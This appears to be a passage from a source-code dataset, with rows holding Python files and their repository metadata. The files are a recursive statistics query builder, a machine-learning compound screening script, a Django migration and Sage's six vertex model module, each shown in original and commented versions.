        'productType,branch1,productColor,branch2,branch3,productCondition'
    :param values: value selector passed through to every stat query,
        e.g. 'sklad1,sklad2'
    :param globalFilter: filter terms appended to every query.
        NOTE(review): it is concatenated with a list via ``+`` below, so it
        must be a list of strings, not the ``''`` the original doc showed --
        verify against callers.
    :param limit: page size, applied at the top level only
    :param offset: page offset, applied at the top level only
    :return: dict with a single key 'stats' holding the nested statistics
    """
    def getRecursive(lvl=0, listStatFilter=[], statIndex=0):
        """
        :param lvl: current nesting level
        :param listStatFilter: segment filters accumulated from the enclosing
            metrics (never mutated in place, so the mutable default is benign)
        :param statIndex: index into ``listStats`` of the metric to process
        :return: a two-element list ['metric name', [stats for that metric]],
            e.g. ['productType', [{'label': ..., 'segment': ...}, ...]].
            ``listStats`` and the outer arguments come from the closure.
        """
        # Recursion exit - needed when listStats is empty to begin with
        if statIndex == len(listStats):
            return None
        # Build the combined filter (NOTE: name shadows the builtin `filter`)
        filter = ';'.join(listStatFilter + globalFilter)
        # Take the next metric for which statistics are required
        curStat = listStats[statIndex]
        # Case 1: the current metric is a branch
        if curStat.startswith('branch'):
            nameMetric = 'branch'
            listBranches = [curStat]
            # Collect every consecutive branch entry
            while statIndex < (len(listStats) - 1):
                statIndex += 1
                if not listStats[statIndex].startswith('branch'):
                    statIndex -= 1
                    break
                listBranches.append(listStats[statIndex])
            listBranches.append('All data') # for the 'All data' branch
            # We now have the branch names; fetch statistics for each of them
            data = []
            for branch in listBranches:
                query = {
                    'method': 'branch', # marks this as a branch query
                    'branch': branch,
                    'values': values,
                    'filter': filter,
                    'limit': None, # limit and offset are meaningless here
                    'offset': None,
                }
                data.append(get_stat_api([query])[0][0])
        # Case 2: a regular metric, e.g. 'productType'
        else:
            nameMetric = metrics[curStat]['name']
            list_of_queries = [{
                'method': metrics[nameMetric]['method'],
                'values': values,
                'filter': filter,
                'limit': limit if lvl == 0 else None,
                'offset': offset if lvl == 0 else None,
            }]
            data = get_stat_api(list_of_queries)[0]
        # Recursion exit - the end of listStats has been reached
        if (statIndex + 1) == len(listStats):
            return [nameMetric, data]
        # Nested branches are handled right here
        if listStats[statIndex + 1] == 'subbranch':
            statIndex += 1 # simply skip this list element
        # ``data`` now holds the statistics for metric ``nameMetric``
        for item in data:
            # An item without a 'segment' field is the last link in its chain
            if 'segment' not in item:
                continue
            result = getRecursive(lvl + 1, listStatFilter + [item['segment']], statIndex + 1)
            # result[0] here equals metrics[metricName]['name']
            item[result[0]] = result[1]
        return [nameMetric, data]
    # To handle nested branches such as branch1,branch2|branch3 correctly,
    # replace the separator with an extra "virtual" metric, yielding roughly
    # the list ['branch1', 'branch2', 'subbranch', "branch3"]
    strStats = strStats.replace('|', ',subbranch,')
    # Turn the requested-statistics string into a list,
    # stripping all spaces from it first
    listStats = strStats.replace(' ', '').split(',')
    return {
        'stats': getRecursive()[1],
    }
| 39 | 0 | 88 |
8a5dc9f0ee9a0de84f2ecc9552a6e60c7b9fee48 | 1,466 | py | Python | deploy2.py | JiajunZhou96/ML-for-LSD1 | 595630076928f0c0d0b78ce182478b7fb0d20ead | [
"MIT"
] | 1 | 2021-12-20T11:50:06.000Z | 2021-12-20T11:50:06.000Z | deploy2.py | JiajunZhou96/ML-for-LSD1 | 595630076928f0c0d0b78ce182478b7fb0d20ead | [
"MIT"
] | null | null | null | deploy2.py | JiajunZhou96/ML-for-LSD1 | 595630076928f0c0d0b78ce182478b7fb0d20ead | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import re
import time
import os
from sklearn.svm import SVR
import joblib
import rdkit
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit_utils import smiles_dataset
from utils import save_dataset
model_load = joblib.load('./models/model.pkl')
database = pd.read_csv('./screening_base/in-vitro_zinc/in-vitro.csv')
screen_database = pd.read_csv('./datasets/screen_results/in-vitro_zinc/in-vitro_bits.csv')
screen_result = model_load.predict(screen_database)
screen_result_fp = pd.DataFrame({'Predictive Results': screen_result})
database_result = pd.concat([database, screen_result_fp], axis = 1)
threshold_7 = database_result[database_result['Predictive Results'] > 7]
original_dataset = pd.read_csv('./datasets/all_structures.csv')
de_threshold_7 = threshold_7
for smile in original_dataset['Smiles']:
for new_structure in threshold_7['smiles']:
if smile == new_structure:
index = threshold_7[threshold_7['smiles'] == smile].index[0]
print('overlap found at position: {:01d}'.format(index))
de_threshold_7 = de_threshold_7.drop(index = index, axis = 0)
else:
pass
save_dataset(threshold_7, path = './datasets/screen_results/in-vitro_zinc/', file_name = 'threshold_7', idx = False)
save_dataset(de_threshold_7, path = './datasets/screen_results/in-vitro_zinc/', file_name = 'de_threshold_7', idx = False)
| 35.756098 | 122 | 0.749659 | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import re
import time
import os
from sklearn.svm import SVR
import joblib
import rdkit
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit_utils import smiles_dataset
from utils import save_dataset
# Trained regression pipeline produced by the training script.
model_load = joblib.load('./models/model.pkl')
# Screening compounds and their precomputed fingerprint bit columns.
# NOTE(review): the two CSVs are assumed to be row-aligned -- confirm.
database = pd.read_csv('./screening_base/in-vitro_zinc/in-vitro.csv')
screen_database = pd.read_csv('./datasets/screen_results/in-vitro_zinc/in-vitro_bits.csv')
screen_result = model_load.predict(screen_database)
screen_result_fp = pd.DataFrame({'Predictive Results': screen_result})
database_result = pd.concat([database, screen_result_fp], axis = 1)
# Keep only compounds with predicted activity above 7.
threshold_7 = database_result[database_result['Predictive Results'] > 7]
original_dataset = pd.read_csv('./datasets/all_structures.csv')
# Drop hits that already occur in the known-structure set.
# NOTE(review): O(len(original) * len(hits)) scan; `.index[0]` takes only the
# first match and dropping the same index twice would raise, so this assumes
# SMILES are unique within threshold_7 -- verify.
de_threshold_7 = threshold_7
for smile in original_dataset['Smiles']:
    for new_structure in threshold_7['smiles']:
        if smile == new_structure:
            index = threshold_7[threshold_7['smiles'] == smile].index[0]
            print('overlap found at position: {:01d}'.format(index))
            de_threshold_7 = de_threshold_7.drop(index = index, axis = 0)
        else:
            pass
save_dataset(threshold_7, path = './datasets/screen_results/in-vitro_zinc/', file_name = 'threshold_7', idx = False)
save_dataset(de_threshold_7, path = './datasets/screen_results/in-vitro_zinc/', file_name = 'de_threshold_7', idx = False)
| 0 | 0 | 0 |
6fd6c18fabfe36ee89c947678a6f06714899f0c2 | 798 | py | Python | core/migrations/0012_auto_20210813_0035.py | winny-/sillypaste | bf6125b35225046226328d1077d7bc7ea5e11c94 | [
"Unlicense"
] | 3 | 2021-05-21T03:45:59.000Z | 2022-01-23T18:26:45.000Z | core/migrations/0012_auto_20210813_0035.py | winny-/sillypaste | bf6125b35225046226328d1077d7bc7ea5e11c94 | [
"Unlicense"
] | 13 | 2021-04-03T19:56:35.000Z | 2022-01-23T18:39:47.000Z | core/migrations/0012_auto_20210813_0035.py | winny-/sillypaste | bf6125b35225046226328d1077d7bc7ea5e11c94 | [
"Unlicense"
] | 1 | 2021-10-03T18:22:55.000Z | 2021-10-03T18:22:55.000Z | # Generated by Django 3.1.12 on 2021-08-13 00:35
from django.db import migrations, models
import django.utils.timezone
| 27.517241 | 76 | 0.601504 | # Generated by Django 3.1.12 on 2021-08-13 00:35
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [('core', '0011_auto_20201105_0203')]
operations = [
migrations.RenameField(
model_name='expirylog', old_name='count', new_name='paste_count'
),
migrations.AddField(
model_name='expirylog',
name='user_count',
field=models.PositiveIntegerField(default=0),
),
migrations.AddField(
model_name='expirylog',
name='user_cutoff',
field=models.DateTimeField(
auto_now_add=True, default=django.utils.timezone.now
),
preserve_default=False,
),
]
| 0 | 654 | 23 |
4d693c50b234f4d287b9940411df75b8d66801fe | 25,754 | py | Python | src/sage/combinat/six_vertex_model.py | fredstro/sage | c936d2cda81ec7ec3552a3bdb29c994b40d1bb24 | [
"BSL-1.0"
] | null | null | null | src/sage/combinat/six_vertex_model.py | fredstro/sage | c936d2cda81ec7ec3552a3bdb29c994b40d1bb24 | [
"BSL-1.0"
] | null | null | null | src/sage/combinat/six_vertex_model.py | fredstro/sage | c936d2cda81ec7ec3552a3bdb29c994b40d1bb24 | [
"BSL-1.0"
] | null | null | null | r"""
Six Vertex Model
"""
from sage.structure.parent import Parent
from sage.structure.unique_representation import UniqueRepresentation
from sage.structure.list_clone import ClonableArray
from sage.categories.finite_enumerated_sets import FiniteEnumeratedSets
from sage.combinat.combinatorial_map import combinatorial_map
class SixVertexConfiguration(ClonableArray):
"""
A configuration in the six vertex model.
"""
    def check(self):
        """
        Check if ``self`` is a valid 6 vertex configuration.

        EXAMPLES::

            sage: M = SixVertexModel(3, boundary_conditions='ice')
            sage: M[0].check()
        """
        # Validity is delegated to the parent model: a configuration is
        # valid exactly when its parent enumerates it.
        if self not in self.parent():
            raise ValueError("invalid configuration")
    def _repr_(self):
        """
        Return a string representation of ``self``.

        EXAMPLES::

            sage: M = SixVertexModel(3, boundary_conditions='ice')
            sage: M[0]
                ^ ^ ^
                | | |
            --> # <- # <- # <--
                | ^ ^
                V | |
            --> # -> # <- # <--
                | | ^
                V V |
            --> # -> # -> # <--
                | | |
                V V V
        """
        # List are in the order of URDL: for each vertex type 0..5 the four
        # fragments are drawn (above, right-of, below, left-of) the '#' glyph.
        ascii = [[r' V ', ' -', r' ^ ', '- '], # LR
                 [r' | ', ' <', r' ^ ', '- '], # LU
                 [r' V ', ' <', r' | ', '- '], # LD
                 [r' | ', ' <', r' | ', '> '], # UD
                 [r' | ', ' -', r' ^ ', '> '], # UR
                 [r' V ', ' -', r' | ', '> ']] # RD
        ret = ' '
        # Do the top line: types 1 (LU), 3 (UD), 4 (UR) point an arrow up and
        # out of the grid, so they render '^'; everything else renders '|'.
        for entry in self[0]:
            if entry == 1 or entry == 3 or entry == 4:
                ret += ' ^ '
            else:
                ret += ' | '
        # Do the meat of the ascii art
        for row in self:
            ret += '\n '
            # Do the top row
            for entry in row:
                ret += ascii[entry][0]
            ret += '\n'
            # Do the left-most entry: types 0-2 (LR, LU, LD) point left/out.
            if row[0] == 0 or row[0] == 1 or row[0] == 2:
                ret += '<-'
            else:
                ret += '--'
            # Do the middle row
            for entry in row:
                ret += ascii[entry][3] + '#' + ascii[entry][1]
            # Do the right-most entry: types 0, 4, 5 (LR, UR, RD) point right/out.
            if row[-1] == 0 or row[-1] == 4 or row[-1] == 5:
                ret += '->'
            else:
                ret += '--'
            # Do the bottom row
            ret += '\n '
            for entry in row:
                ret += ascii[entry][2]
        # Do the bottom line: types 2, 3, 5 (LD, UD, RD) point down/out.
        ret += '\n '
        for entry in self[-1]:
            if entry == 2 or entry == 3 or entry == 5:
                ret += ' V '
            else:
                ret += ' | '
        return ret
def to_signed_matrix(self):
"""
Return the signed matrix of ``self``.
The signed matrix corresponding to a six vertex configuration is
given by `0` if there is a cross flow, a `1` if the outward arrows
are vertical and `-1` if the outward arrows are horizonal.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: map(lambda x: x.to_signed_matrix(), M)
[
[1 0 0] [1 0 0] [ 0 1 0] [0 1 0] [0 1 0] [0 0 1] [0 0 1]
[0 1 0] [0 0 1] [ 1 -1 1] [1 0 0] [0 0 1] [1 0 0] [0 1 0]
[0 0 1], [0 1 0], [ 0 1 0], [0 0 1], [1 0 0], [0 1 0], [1 0 0]
]
"""
from sage.matrix.constructor import matrix
# verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
return matrix([[matrix_sign(_) for _ in row] for row in self])
    def plot(self, color='sign'):
        """
        Return a plot of ``self``.

        INPUT:

        - ``color`` -- can be any of the following:

          * ``4`` - use 4 colors: black, red, blue, and green with each
            corresponding to up, right, down, and left respectively
          * ``2`` - use 2 colors: red for horizontal, blue for vertical arrows
          * ``'sign'`` - use red for right and down arrows, blue for left
            and up arrows
          * a list of 4 colors for each direction
          * a function which takes a direction and a boolean corresponding
            to the sign

        EXAMPLES::

            sage: M = SixVertexModel(2, boundary_conditions='ice')
            sage: print M[0].plot().description()
            Arrow from (-1.0,0.0) to (0.0,0.0)
            Arrow from (-1.0,1.0) to (0.0,1.0)
            Arrow from (0.0,0.0) to (0.0,-1.0)
            Arrow from (0.0,0.0) to (1.0,0.0)
            Arrow from (0.0,1.0) to (0.0,0.0)
            Arrow from (0.0,1.0) to (0.0,2.0)
            Arrow from (1.0,0.0) to (1.0,-1.0)
            Arrow from (1.0,0.0) to (1.0,1.0)
            Arrow from (1.0,1.0) to (0.0,1.0)
            Arrow from (1.0,1.0) to (1.0,2.0)
            Arrow from (2.0,0.0) to (1.0,0.0)
            Arrow from (2.0,1.0) to (1.0,1.0)
        """
        from sage.plot.graphics import Graphics
        from sage.plot.circle import circle
        from sage.plot.arrow import arrow
        # ``cfunc(d, pm)`` picks an arrow color from a direction d (0..3 in
        # URDL order) and a sign flag pm (True for right/down arrows).
        if color == 4:
            color_list = ['black', 'red', 'blue', 'green']
            cfunc = lambda d,pm: color_list[d]
        elif color == 2:
            cfunc = lambda d,pm: 'red' if d % 2 == 0 else 'blue'
        elif color == 1 or color is None:
            cfunc = lambda d,pm: 'black'
        elif color == 'sign':
            cfunc = lambda d,pm: 'red' if pm else 'blue' # RD are True
        elif isinstance(color, (list, tuple)):
            cfunc = lambda d,pm: color[d]
        else:
            cfunc = color
        # NOTE(review): ``circle`` is imported but unused here.
        G = Graphics()
        # Rows are drawn bottom-up (reversed), so j == 0 is the bottom row;
        # the ``j == 0`` / ``i == 0`` branches add the boundary arrows that
        # enter/leave the grid at the bottom and left edges.
        for j,row in enumerate(reversed(self)):
            for i,entry in enumerate(row):
                if entry == 0: # LR
                    G += arrow((i,j+1), (i,j), color=cfunc(2, True))
                    G += arrow((i,j), (i+1,j), color=cfunc(1, True))
                    if j == 0:
                        G += arrow((i,j-1), (i,j), color=cfunc(0, False))
                    if i == 0:
                        G += arrow((i,j), (i-1,j), color=cfunc(3, False))
                elif entry == 1: # LU
                    G += arrow((i,j), (i,j+1), color=cfunc(0, False))
                    G += arrow((i+1,j), (i,j), color=cfunc(3, False))
                    if j == 0:
                        G += arrow((i,j-1), (i,j), color=cfunc(0, False))
                    if i == 0:
                        G += arrow((i,j), (i-1,j), color=cfunc(3, False))
                elif entry == 2: # LD
                    G += arrow((i,j+1), (i,j), color=cfunc(2, True))
                    G += arrow((i+1,j), (i,j), color=cfunc(3, False))
                    if j == 0:
                        G += arrow((i,j), (i,j-1), color=cfunc(2, True))
                    if i == 0:
                        G += arrow((i,j), (i-1,j), color=cfunc(3, False))
                elif entry == 3: # UD
                    G += arrow((i,j), (i,j+1), color=cfunc(0, False))
                    G += arrow((i+1,j), (i,j), color=cfunc(3, False))
                    if j == 0:
                        G += arrow((i,j), (i,j-1), color=cfunc(2, True))
                    if i == 0:
                        G += arrow((i-1,j), (i,j), color=cfunc(1, True))
                elif entry == 4: # UR
                    G += arrow((i,j), (i,j+1), color=cfunc(0, False))
                    G += arrow((i,j), (i+1,j), color=cfunc(1, True))
                    if j == 0:
                        G += arrow((i,j-1), (i,j), color=cfunc(0, False))
                    if i == 0:
                        G += arrow((i-1,j), (i,j), color=cfunc(1, True))
                elif entry == 5: # RD
                    G += arrow((i,j+1), (i,j), color=cfunc(2, True))
                    G += arrow((i,j), (i+1,j), color=cfunc(1, True))
                    if j == 0:
                        G += arrow((i,j), (i,j-1), color=cfunc(2, True))
                    if i == 0:
                        G += arrow((i-1,j), (i,j), color=cfunc(1, True))
        G.axes(False)
        return G
    def energy(self, epsilon):
        r"""
        Return the energy of the configuration.

        The energy of a configuration `\nu` is defined as

        .. MATH::

            E(\nu) = n_0 \epsilon_0 + n_1 \epsilon_1 + \cdots + n_5 \epsilon_5

        where `n_i` is the number of vertices of type `i` and
        `\epsilon_i` is the `i`-th energy constant.

        .. NOTE::

            We number our configurations as:

            0. LR
            1. LU
            2. LD
            3. UD
            4. UR
            5. RD

            which differs from :wikipedia:`Ice-type_model`.

        EXAMPLES::

            sage: M = SixVertexModel(3, boundary_conditions='ice')
            sage: nu = M[2]; nu
                ^ ^ ^
                | | |
            --> # -> # <- # <--
                ^ | ^
                | V |
            --> # <- # -> # <--
                | ^ |
                V | V
            --> # -> # <- # <--
                | | |
                V V V
            sage: nu.energy([1,2,1,2,1,2])
            15

        A KDP energy::

            sage: nu.energy([1,1,0,1,0,1])
            7

        A Rys `F` energy::

            sage: nu.energy([0,1,1,0,1,1])
            4

        The zero field assumption::

            sage: nu.energy([1,2,3,1,3,2])
            15
        """
        # ``epsilon`` must supply one constant per vertex type 0..5.
        if len(epsilon) != 6:
            raise ValueError("there must be 6 energy constants")
        # Each grid entry *is* its vertex type, so the energy is the sum of
        # the per-type constants over all cells.
        return sum(epsilon[entry] for row in self for entry in row)
class SixVertexModel(UniqueRepresentation, Parent):
"""
The six vertex model.
We model a configuration by indicating which configuration by the
following six configurations which are determined by the two outgoing
arrows in the Up, Right, Down, Left directions:
1. LR::
|
V
<-- # -->
^
|
2. LU::
^
|
<-- # <--
^
|
3. LD::
|
V
<-- # <--
|
V
4. UD::
^
|
--> # <--
|
V
5. UR::
^
|
--> # -->
^
|
6. RD::
|
V
--> # -->
|
V
INPUT:
- ``n`` -- the number of rows
- ``m`` -- (optional) the number of columns, if not specified, then
the number of columns is the number of rows
- ``boundary_conditions`` -- (optional) a quadruple of tuples whose
entries are either:
* ``True`` for an inward arrow,
* ``False`` for an outward arrow, or
* ``None`` for no boundary condition.
There are also the following predefined boundary conditions:
* ``'ice'`` - The top and bottom boundary conditions are outward and the
left and right boundary conditions are inward; this gives the square
ice model. Also called domain wall boundary conditions.
* ``'domain wall'`` - Same as ``'ice'``.
* ``'alternating'`` - The boundary conditions alternate between inward
and outward.
* ``'free'`` - There are no boundary conditions.
EXAMPLES:
Here are the six types of vertices that can be created::
sage: M = SixVertexModel(1)
sage: list(M)
[
| ^ | ^ ^ |
V | V | | V
<-- # --> <-- # <-- <-- # <-- --> # <-- --> # --> --> # -->
^ ^ | | ^ |
| , | , V , V , | , V
]
When using the square ice model, it is known that the number of
configurations is equal to the number of alternating sign matrices::
sage: M = SixVertexModel(1, boundary_conditions='ice')
sage: len(M)
1
sage: M = SixVertexModel(4, boundary_conditions='ice')
sage: len(M)
42
sage: all(len(SixVertexModel(n, boundary_conditions='ice'))
....: == AlternatingSignMatrices(n).cardinality() for n in range(1, 7))
True
An example with a specified non-standard boundary condition and
non-rectangular shape::
sage: M = SixVertexModel(2, 1, [[None], [True,True], [None], [None,None]])
sage: list(M)
[
^ ^ | ^
| | V |
<-- # <-- <-- # <-- <-- # <-- --> # <--
^ ^ | |
| | V V
<-- # <-- --> # <-- <-- # <-- <-- # <--
^ | | |
| , V , V , V
]
REFERENCES:
- :wikipedia:`Vertex_model`
- :wikipedia:`Ice-type_model`
"""
    @staticmethod
    def __classcall_private__(cls, n, m=None, boundary_conditions=None):
        """
        Normalize input to ensure a unique representation.

        EXAMPLES::

            sage: M1 = SixVertexModel(1, boundary_conditions=[[False],[True],[False],[True]])
            sage: M2 = SixVertexModel(1, 1, ((False,),(True,),(False,),(True,)))
            sage: M1 is M2
            True
        """
        # Default to a square grid.
        if m is None:
            m = n
        # Boundary conditions are normalized to a quadruple of tuples in
        # URDL order (top, right, bottom, left).
        if boundary_conditions is None or boundary_conditions == 'free':
            boundary_conditions = ((None,)*m, (None,)*n)*2
        elif boundary_conditions == 'alternating':
            # Alternate in/out arrows, continuing around top, right,
            # bottom, left.
            bdry = True
            cond = []
            for dummy in range(2):
                val = []
                for k in range(m):
                    val.append(bdry)
                    bdry = not bdry
                cond.append(tuple(val))
                val = []
                for k in range(n):
                    val.append(bdry)
                    bdry = not bdry
                cond.append(tuple(val))
            boundary_conditions = tuple(cond)
        elif boundary_conditions == 'ice' or boundary_conditions == 'domain wall':
            # Square ice gets its dedicated subclass.
            if m == n:
                return SquareIceModel(n)
            boundary_conditions = ((False,)*m, (True,)*n)*2
        else:
            # Freeze user-supplied conditions into hashable tuples.
            boundary_conditions = tuple(tuple(x) for x in boundary_conditions)
        return super(SixVertexModel, cls).__classcall__(cls, n, m, boundary_conditions)
    def __init__(self, n, m, boundary_conditions):
        """
        Initialize ``self``.

        EXAMPLES::

            sage: M = SixVertexModel(2, boundary_conditions='ice')
            sage: TestSuite(M).run()
        """
        # Grid dimensions; boundary conditions were already normalized to a
        # quadruple of tuples by __classcall_private__.
        self._nrows = n
        self._ncols = m
        self._bdry_cond = boundary_conditions # Ordered URDL
        Parent.__init__(self, category=FiniteEnumeratedSets())
def _repr_(self):
"""
Return a string representation of ``self``.
EXAMPLES::
sage: SixVertexModel(2, boundary_conditions='ice')
The six vertex model on a 2 by 2 grid
"""
return "The six vertex model on a {} by {} grid".format(self._nrows, self._ncols)
def _repr_option(self, key):
"""
Metadata about the ``_repr_()`` output.
See :meth:`sage.structure.parent._repr_option` for details.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: M._repr_option('element_ascii_art')
True
"""
if key == 'element_ascii_art':
return True
return Parent._repr_option(self, key)
    def _element_constructor_(self, x):
        """
        Construct an element of ``self``.

        EXAMPLES::

            sage: M = SixVertexModel(2, boundary_conditions='ice')
            sage: M([[3,1],[5,3]])
                ^    ^
                |    |
            --> # <- # <--
                |    ^
                V    |
            --> # -> # <--
                |    |
                V    V
        """
        # An existing configuration is re-wrapped only if it belongs to a
        # different parent; otherwise it is returned unchanged.
        if isinstance(x, SixVertexConfiguration):
            if x.parent() is not self:
                return self.element_class(self, tuple(x))
            return x

        # Otherwise ``x`` is an iterable of rows whose entries are either
        # vertex-type names ('LR', ..., 'RD') or their integer codes 0..5.
        verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
        elt = []
        for row in x:
            elt.append([])
            for entry in row:
                if entry in verts:
                    elt[-1].append(verts.index(entry))
                elif entry in range(6):
                    elt[-1].append(entry)
                else:
                    raise ValueError("invalid entry")
            elt[-1] = tuple(elt[-1])
        return self.element_class(self, tuple(elt))
Element = SixVertexConfiguration
def __iter__(self):
"""
Iterate through ``self``.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: list(M)
[
^ ^ ^ ^
| | | |
--> # <- # <-- --> # -> # <--
| ^ ^ |
V | | V
--> # -> # <-- --> # <- # <--
| | | |
V V , V V
]
"""
# Boundary conditions ordered URDL
# The top row boundary condition of True is a downward arrow
# The left condition of True is a right arrow
# verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
next_top = [False, False, True, True, False, True]
next_left = [True, False, False, False, True, True]
check_top = [True, False, True, False, False, True]
check_left = [False, False, False, True, True, True]
bdry = [self._bdry_cond[0]]
lbd = list(self._bdry_cond[3]) + [None] # Dummy
left = [ [lbd[0]] ]
cur = [[-1]]
n = self._nrows
m = self._ncols
# [[3, 1], [5, 3]]
# [[4, 3], [3, 2]]
while len(cur) > 0:
# If we're at the last row
if len(cur) > n:
cur.pop()
left.pop()
# Check if all our bottom boundry conditions are statisfied
if all(x is not self._bdry_cond[2][i]
for i,x in enumerate(bdry[-1])):
yield self.element_class(self, tuple(tuple(x) for x in cur))
bdry.pop()
# Find the next row
row = cur[-1]
l = left[-1]
i = len(cur) - 1
while len(row) > 0:
row[-1] += 1
# Check to see if we have more vertices
if row[-1] > 5:
row.pop()
l.pop()
continue
# Check to see if we can add the vertex
if (check_left[row[-1]] is l[-1] or l[-1] is None) \
and (check_top[row[-1]] is bdry[-1][len(row)-1]
or bdry[-1][len(row)-1] is None):
if len(row) != m:
l.append(next_left[row[-1]])
row.append(-1)
# Check the right bdry condition since we are at the rightmost entry
elif next_left[row[-1]] is not self._bdry_cond[1][i]:
bdry.append([next_top[x] for x in row])
cur.append([-1])
left.append([lbd[i+1]])
break
# If we've killed this row, backup
if len(row) == 0:
cur.pop()
bdry.pop()
left.pop()
def boundary_conditions(self):
"""
Return the boundary conditions of ``self``.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: M.boundary_conditions()
((False, False), (True, True), (False, False), (True, True))
"""
return self._bdry_cond
def partition_function(self, beta, epsilon):
r"""
Return the partition function of ``self``.
The partition function of a 6 vertex model is defined by:
.. MATH::
Z = \sum_{\nu} e^{-\beta E(\nu)}
where we sum over all configurations and `E` is the energy function.
The constant `\beta` is known as the *inverse temperature* and is
equal to `1 / k_B T` where `k_B` is Boltzmann's constant and `T` is
the system's temperature.
INPUT:
- ``beta`` -- the inverse temperature constant `\beta`
- ``epsilon`` -- the energy constants, see
:meth:`~sage.combinat.six_vertex_model.SixVertexConfiguration.energy()`
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: M.partition_function(2, [1,2,1,2,1,2])
e^(-24) + 2*e^(-28) + e^(-30) + 2*e^(-32) + e^(-36)
REFERENCES:
:wikipedia:`Partition_function_(statistical_mechanics)`
"""
from sage.functions.log import exp
return sum(exp(-beta * nu.energy(epsilon)) for nu in self)
class SquareIceModel(SixVertexModel):
r"""
The square ice model.
The square ice model is a 6 vertex model on an `n \times n` grid with
the boundary conditions that the top and bottom boundaries are pointing
outward and the left and right boundaries are pointing inward. These
boundary conditions are also called domain wall boundary conditions.
Configurations of the 6 vertex model with domain wall boundary conditions
are in bijection with alternating sign matrices.
"""
def __init__(self, n):
"""
Initialize ``self``.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: TestSuite(M).run()
"""
boundary_conditions = ((False,)*n, (True,)*n)*2
SixVertexModel.__init__(self, n, n, boundary_conditions)
def from_alternating_sign_matrix(self, asm):
"""
Return a configuration from the alternating sign matrix ``asm``.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: asm = AlternatingSignMatrix([[0,1,0],[1,-1,1],[0,1,0]])
sage: M.from_alternating_sign_matrix(asm)
^ ^ ^
| | |
--> # -> # <- # <--
^ | ^
| V |
--> # <- # -> # <--
| ^ |
V | V
--> # -> # <- # <--
| | |
V V V
TESTS::
sage: M = SixVertexModel(5, boundary_conditions='ice')
sage: ASM = AlternatingSignMatrices(5)
sage: all(M.from_alternating_sign_matrix(x.to_alternating_sign_matrix()) == x
....: for x in M)
True
sage: all(M.from_alternating_sign_matrix(x).to_alternating_sign_matrix() == x
....: for x in ASM)
True
"""
if asm.parent().size() != self._nrows:
raise ValueError("mismatched size")
#verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
ret = []
bdry = [False]*self._nrows # False = up
for row in asm.to_matrix():
cur = []
right = True # True = right
for j,entry in enumerate(row):
if entry == -1:
cur.append(0)
right = True
bdry[j] = False
elif entry == 1:
cur.append(3)
right = False
bdry[j] = True
else: # entry == 0
if bdry[j]:
if right:
cur.append(5)
else:
cur.append(2)
else:
if right:
cur.append(4)
else:
cur.append(1)
ret.append(tuple(cur))
return self.element_class(self, tuple(ret))
class Element(SixVertexConfiguration):
"""
An element in the square ice model.
"""
@combinatorial_map(name='to alternating sign matrix')
def to_alternating_sign_matrix(self):
"""
Return an alternating sign matrix of ``self``.
.. SEEALSO::
:meth:`~sage.combinat.six_vertex_model.SixVertexConfiguration.to_signed_matrix()`
EXAMPLES::
sage: M = SixVertexModel(4, boundary_conditions='ice')
sage: M[6].to_alternating_sign_matrix()
[1 0 0 0]
[0 0 0 1]
[0 0 1 0]
[0 1 0 0]
sage: M[7].to_alternating_sign_matrix()
[ 0 1 0 0]
[ 1 -1 1 0]
[ 0 1 -1 1]
[ 0 0 1 0]
"""
from sage.combinat.alternating_sign_matrix import AlternatingSignMatrix #AlternatingSignMatrices
#ASM = AlternatingSignMatrices(self.parent()._nrows)
#return ASM(self.to_signed_matrix())
return AlternatingSignMatrix(self.to_signed_matrix())
| 33.017949 | 108 | 0.435117 | r"""
Six Vertex Model
"""
from sage.structure.parent import Parent
from sage.structure.unique_representation import UniqueRepresentation
from sage.structure.list_clone import ClonableArray
from sage.categories.finite_enumerated_sets import FiniteEnumeratedSets
from sage.combinat.combinatorial_map import combinatorial_map
class SixVertexConfiguration(ClonableArray):
"""
A configuration in the six vertex model.
"""
def check(self):
"""
Check if ``self`` is a valid 6 vertex configuration.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: M[0].check()
"""
if self not in self.parent():
raise ValueError("invalid configuration")
def _repr_(self):
"""
Return a string representation of ``self``.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: M[0]
^ ^ ^
| | |
--> # <- # <- # <--
| ^ ^
V | |
--> # -> # <- # <--
| | ^
V V |
--> # -> # -> # <--
| | |
V V V
"""
# List are in the order of URDL
ascii = [[r' V ', ' -', r' ^ ', '- '], # LR
[r' | ', ' <', r' ^ ', '- '], # LU
[r' V ', ' <', r' | ', '- '], # LD
[r' | ', ' <', r' | ', '> '], # UD
[r' | ', ' -', r' ^ ', '> '], # UR
[r' V ', ' -', r' | ', '> ']] # RD
ret = ' '
# Do the top line
for entry in self[0]:
if entry == 1 or entry == 3 or entry == 4:
ret += ' ^ '
else:
ret += ' | '
# Do the meat of the ascii art
for row in self:
ret += '\n '
# Do the top row
for entry in row:
ret += ascii[entry][0]
ret += '\n'
# Do the left-most entry
if row[0] == 0 or row[0] == 1 or row[0] == 2:
ret += '<-'
else:
ret += '--'
# Do the middle row
for entry in row:
ret += ascii[entry][3] + '#' + ascii[entry][1]
# Do the right-most entry
if row[-1] == 0 or row[-1] == 4 or row[-1] == 5:
ret += '->'
else:
ret += '--'
# Do the bottom row
ret += '\n '
for entry in row:
ret += ascii[entry][2]
# Do the bottom line
ret += '\n '
for entry in self[-1]:
if entry == 2 or entry == 3 or entry == 5:
ret += ' V '
else:
ret += ' | '
return ret
def to_signed_matrix(self):
"""
